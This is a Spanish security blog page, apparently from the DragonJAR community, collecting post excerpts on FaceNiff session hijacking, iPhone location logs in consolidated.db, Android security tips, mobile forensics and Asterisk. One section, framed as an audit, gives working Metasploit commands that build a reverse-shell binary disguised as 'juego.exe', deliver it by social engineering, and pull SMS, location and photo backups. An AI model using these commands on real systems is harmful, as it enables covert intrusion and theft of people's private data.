La Comunidad DragonJAR

Cuando Firesheep salió a la luz durante la Toorcon de San Diego en Octubre del año pasado causó mucho revuelo por poner a disposición de cualquier persona el robo de sesiones (Session Hijacking) en una red de forma automática.

Un tiempo ha pasado desde que Firesheep estaba en furor y ahora llega una nueva aplicación dispuesta a robar su lugar, se trata de FaceNiff, una aplicación para Android que sin la ayuda de un navegador o driver permite robar la sección de diferentes sitios (Facebook, Twitter, YouTube), solo utilizando un teléfono Android “rooteado”. Leer más…

Hace unos días Pete Warden y Alasdair Allen publicaron una investigación en la que descubrieron un archivo con nombre consolidated.db en cuyo interior se encuentra almacenado un registro de las ultimas ubicaciones donde estuviéramos con nuestro dispositivo iOS.

La noticia le dió la vuelta al mundo en poco tiempo, logrando que Steve Jobs se pronunciara al respecto y saliera con la ya típica respuesta, “no lo hacemos, nuestra competencia sí”, pero por mucho que Jobs niegue el asunto, es un hecho que el archivo existe y que en él se encuentra un registro de nuestros pasos mientras tenemos nuestro dispositivo en el bolsillo, en este artículo vamos a ver los distintos métodos que tenemos para ubicar el archivo Consolidated.db, obtener e interpretar este registro.

La primera herramienta que veremos es iPhone Tracker, publicada por Warden y  Allen junto con su investigación que de momento funciona solo en Mac OS X.

Obteniendo Geoposición de iPhone con iPhone Tracker

Primero que todo debemos obtener una copia del iPhone Tracker y para ello tenemos dos opciones

1. Descargamos el código fuente, lo leemos y compilamos con XCode (recomendada)
2. Descargar la aplicación compilada y ejecutarla en tu sistema

De cualquiera de las dos formas, cuando ejecutamos la aplicación tenemos algo como esto:

Donde el punto azul es el registro de nuestra posición y a medida que aumentamos el zoom de la imagen, tendremos mas detalle de este registro; Como pueden ver, el proceso es bastante sencillo y cualquier persona puede hacerlo si tienen un equipo con Mac OS X.

Pero los usuarios de windows también tienen varias herramientas para obtener este listado..

Obteniendo Geoposición de iPhone en Windows

Para sacar la posición GPS almacenada en el archivo consolidated.db en sistemas Microsoft Windows tenemos varias opciones, la primera iPhone Tracking for Windows.

Con el que podemos ubicar automáticamente el archivo consolidated.db de nuestro backup, delimitar las fechas en las que hicimos un recorrido y posicionar en un mapa las ultimas ubicaciones almacenadas por nuestro dispositivo.

La otra opción que tenemos en Windows es iPhoneTrackerWin, que como funcionalidad adicional, permite cargar el archivo consolidated.db de otras fuentes, por lo que si obtenemos el backup de otro iPhone, podemos visualizarlo gráficamente gracias a este software.

Como muchos han dicho ya el archivo consolidated.db es en realidad una base de datos en sqlite por lo que con cualquier FrontEnd de SQLite puedes visualizar la información de este archivo, aunque no gráficamente como las herramientas mencionadas anteriormente.

Obteniendo el Backup del iPhone/iPad con Metasploit

Si estamos realizando una auditoria de seguridad y sabemos que un funcionario de la organización auditada, cuenta con un dispositivo iOS con 3G (iPad o iPhone), podemos obtener la información de este dispositivo, por medio de un nuevo modulo con nombre apple_ios_backup desarrollado por el propio H.D. Moore, creador de nuestro framework favorito Metasploit.

Debemos tener una sección de meterpreter en el equipo donde tenemos el backup, para ello vamos a generar un binario con el meterpreter y por medio de ingeniería social, lograremos que lo ejecuten en el equipo donde se encuentra el backup.

dragon@bt:~# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.13 X > juego.exe

Mientras dejamos a la escucha el handler que recibirá la conexión del ejecutable juego.exe

dragon@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.13 E

El ejecutable lo podemos empaquetar junto a cualquier otro programa  y lograr que lo corran en el equipo deseado, una vez tenemos una sección meterpreter en la maquina, ejecutamos el modulo de apple_ios_backup para sacar las bases de datos (localización, mensajes sms, imágenes, archivos de preferencias).

meterpreter > run windows/gather/apple_ios_backup

Si el equipo víctima es un Vista o Windows 7 seguramente no tendrás problemas, pero si el equipo víctima es un Windows XP en español como en mi caso, tendremos que echarle mano al archivo modules/post/windows/gather/apple_ios_backup.rb como seguramente muchas veces te ha tocado hacer y cambiar las rutas para que funcionen en los sistemas XP con idioma español.

			if os =~ /Windows 7|Vista|2008/
				@appdata = '\\AppData\\Roaming'
				@users = drive + '\\Users'
			else
				@appdata = '\\Application Data'
				@users = drive + '\\Documents and Settings'
			end

En la linea 61 cambiamos “\\Application Data” por “\\Datos de programa” y probamos de nuevo consiguiendo que el modulo creado por H.D. Moore funcione sin problemas, obteniendo los backups almacenados en la maquina.

Por último les dejo un vídeo donde Alasdair Allan habla sobre este problema en los dispositivos de Apple.

Espero que les sea de utilidad este texto y dejen sus comentarios abajo…

Este mismo tutorial sirve para hacer Jailbreak al iOS 4.3.2, 4.3.1 o 4.3 Untethered, sin tener que conectar al pc tu dispositivo cada vez que lo apagues o se descargue.
Ahora que he probado un nuevo método de Jailbreak Untethered personalmente en un iPhone 4 y un iPod Touch 2G con iOS 4.3, 4.3.1 o 4.3.2, lo comparto con todos ustedes para que tengan la tranquilidad de realizar el procedimiento sin problemas en su iPhone o iPod Touch (para el iPad aquí esta el procedimiento).

Leer más…

FE DE ERRATA:
La información contenida en esta noticia realmente se trataba del proyecto final del Master de Seguridad Informática de la Universidad Europea de Madrid, con el que varios estudiantes  pretendían correr un rumor falso en internet y colarlos en varios sitios conocidos.

Como podrán ver lograron su comentido, realmente la noticia fué muy bien elaborada y bastante creíble, se supieron armar de una buena trama (bastante posible por cierto) y caímos bien a fondo en el afán de informar para evitar que otras personas resultaran victimas de este “robo de información”.

En todo caso me alegra que de alguna forma ayudara a graduarse de Master a estos personajes y que la difusión de la falsa noticia concientizara un poco a los poseedores de dispositivos con Android sobre la seguridad de su sistema, por eso paso a dejar la noticia como estaba, pero poniendo en primer lugar las recomendaciones de seguridad para dispositivos Android, por que aunque esta noticia en particular fuera falsa, la amenaza de troyanos y malware en esta plataforma si que es real así que debemos protegernos de ella.

Recomendaciones de seguridad para tu dispositivo con Android

1). Instale un buen antivirus en su dispositivo Android, algunas alternativas son:

• AntiVirus Free
• Super Security
• Phone Spam Blocker USA
• Lookout Mobile Security
• Anti-Virus Laser

2). Utilice una buena contraseña

3). Navegue con cuidado, con las mismas precauciones que lo haría si estuviera en un PC

4). NO instale aplicaciones innecesarias en su smartphone y siempre hágalo de repositorios de confianza

5). Realice periódicamente una copia de seguridad de toda la información que tenga en el dispositivo

6). NO guarde su contraseña dentro de los programas del teléfono (es cómodo pero peligroso)

7). NO abra mensajes de spam

8). Mantenga al día las aplicaciones instaladas y el sistema operativo

Los chinos copian cualquier cosa y algunas veces lo hacen realmente bien, tanto que muchos sentimos temor a la hora de encargarle a un familiar la compra de un producto Apple, por que muy a menudo en vez de comprar el iPad compraran el ePad; Pero ahora ademas de este temor debemos preocuparnos de otra cosa mas importante…. nuestra información.

Me ha llegado un correo de Luis Argente Castro un ingeniero que aunque le apasionan los productos de la manzana, le parecen bastante costosos y escribe en su blog “Me pone un Mac? De los baratos si puede ser…” reviews de las alternativas chinas a estos productos, como era de esperarse Castro en vez de comprar la famosa tableta de Apple el iPad, decidió comprar una de sus copias chinas llamada ePad. Leer más…

Una de las principales barreras que protege la seguridad de nuestra información en los dispositivos móviles de Apple (iPhone,iPad,iPod Touch) es el código de seguridad que debemos ingresar para poder acceder a nuestro dispositivo, ya sea para sincronizarlo, sacar información o ejecutar las aplicaciones instaladas, siempre es necesario ingresar este código de seguridad para poder realizar estos procesos.

Pero… como todo sistema donde el usuario debe registrar una secuencia de caracteres o números, para volver a introducirlos como credenciales de acceso, es normal que muchos de ellos olviden el código de 4 dígitos que deben proporcionar y no puedan acceder a la información almacenada en su Gadget. En este articulo veremos algunas de las opciones que tenemos para poder recuperar o eliminar este código de seguridad y como fortalecer un poco esta medida de seguridad. Leer más…

Continuamos con la segunda parte del articulo Análisis Forense en Teléfonos Celulares escrito por Jorge Alberto Cuervo para La Comunidad DragonJAR, si aun no has visto la primera parte de este articulo puedes encontrarla en este enlace.

En esta parte del proceso, nos aparece otra ventana donde nos da tres opciones para continuar, la primera opción, que es la que debemos seleccionar si es la primera conexión del teléfono, es el instalar el programa cliente de oxigen forensics 2010 en el celular. Pueden surgir muchos comentarios e interrogantes en esta parte del proceso, y es, “se invalida la evidencia obtenida?”; si analizamos un poco, los datos a examinar o evaluar en un dispositivo móvil, en este caso un celular, es la información referente a contactos, llamadas realizadas o recibidas, tiempos y fecha de duración, números telefónicos entrantes y salientes, mensajes, fotografías, etc. Por lo tanto, no debería invalidarse ya que se conserva la integridad de los datos de interés para la investigación. Leer más…

El celular se ha convertido en el medio masivo de comunicación por excelencia gracias a su portabilidad, servicios y bajos costos en las tarifas. Esta explosión tecnológica que no da tregua, nos sorprende con la gran variedad de sofisticados equipos y la frecuencia vertiginosa con la que unos modelos dejan en la obsolescencia a los modelos anteriores.

Nuevos servicios como la transmisión de vídeo digital, fotografía, posicionamiento global, wi-fi, capacidad para ejecutar una gran variedad de aplicaciones, han hecho de este medio de comunicación, un dispositivo que se utiliza hoy en día por millones de personas en el mundo para algo mas que hacer una llamada.

Pero como todos sabemos, la tecnología no es buena ni mala, solo depende del uso que le demos; así es que este maravilloso invento que nos ha proporcionado grandes satisfacciones, también ha sido de gran utilidad para cometer una gran variedad de delitos…. Entre los más conocidos, la clonación de las simcard, la intercepción de mensajes en transacciones bancarias, el secuestro, narcotráfico, el intercambio de imágenes de pedofilia, la extorsión y un largo etcétera. Leer más…

Asterisk es una aplicación OpenSource que nos permite tener una PBX en nuestro equipo utilizando una estructura cliente/servidor permitiendo que terminales se conecten a el y puedan transmitir voz/video en tiempo real utilizando protocolos como SIP, H.323 y codecs como GSM, ILBC/Speech.

La gran mayoría de instalaciones de Asterisk se realiza sobre entornos GNU/Linux, ya que los desarrolladores de drivers o módulos para hacer compatible hardware con Asterisk se han centrado en los sistemas GNU/Linux (por eso las tarjetas de comunicaciones sólo sean compatibles con sistemas GNU Linux); Pero eso no quiere decir que no podamos instalar este excelente software para crear nuestro PBX en casa usando cualquier *NIX y utiliza gateways como VegaStream, Epygi, Soundwin, GrandStream, o cualquier otro que soporte el protocolo SIP. Leer más…

Esta historia parecía destinada a no salir de mis borradores, ya que aun guardaba esperanzas de recuperar mis cosas, pero al revisar las charlas de la DEFCON18 encontré una que me motivó a terminar este borrador, la charla se titula “Pwned By The Owner: What Happens When You Steal A Hacker’s Computer” y básicamente lo que les cuenta ZOZ, es muy similar a lo que me sucedió a mí, solo que en mi caso no hay final feliz…

Todo sucedió el primero de septiembre de 2010, a unos cuantos días de mi viaje para presentar el reto forense de la EKO Party; En la cafetería de mi universidad y gracias a un descuido mío de unos pocos minutos, logré extraviar un maletín que contenía entre otras cosas mi portátil MacBook PRO, mi disco duro Western Digital de 1TB y varios libros técnicos. Leer más…